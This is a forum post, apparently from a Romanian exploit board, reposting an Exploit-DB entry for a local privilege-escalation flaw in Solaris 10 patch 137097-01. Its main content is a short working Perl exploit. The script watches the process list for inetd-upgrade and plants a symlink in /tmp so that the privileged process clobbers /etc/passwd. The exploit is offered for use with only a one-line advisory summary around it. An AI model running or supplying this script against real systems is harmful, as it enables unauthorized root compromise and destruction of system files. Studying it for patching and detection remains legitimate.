Jump to content
DarkyAngel

Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation

By DarkyAngel, in Exploituri

Recommended Posts

DarkyAngel Newbie

DarkyAngel

Posted
Posted

Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation

[table=width: 500, class: grid]

[tr]

[td]EDB-ID: 20418[/td]

[td]CVE: N/A[/td]

[td]OSVDB-ID: N/A[/td]

[/tr]

[tr]

[td]Author: Larry Cashdollar[/td]

[td]Published: 2012-08-11[/td]

[td]Verified: cancel.png[/td]

[/tr]

[tr]

[td]Exploit Code: 46.png[/td]

[td]Vulnerable App: N/A[/td]

[td][/td]

[/tr]

[/table]

Source: http://www.securityfocus.com/bid/54919/info

Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to gain elevated privileges on affected computers.

#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/inetd-upgrade/) {
        print "Symlinking iconf_entries.$args[1] to  $clobber\n";
        symlink($clobber,"/tmp/iconf_entries.$args[1]");
        exit(1);
   }
 }

}

Sursa

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...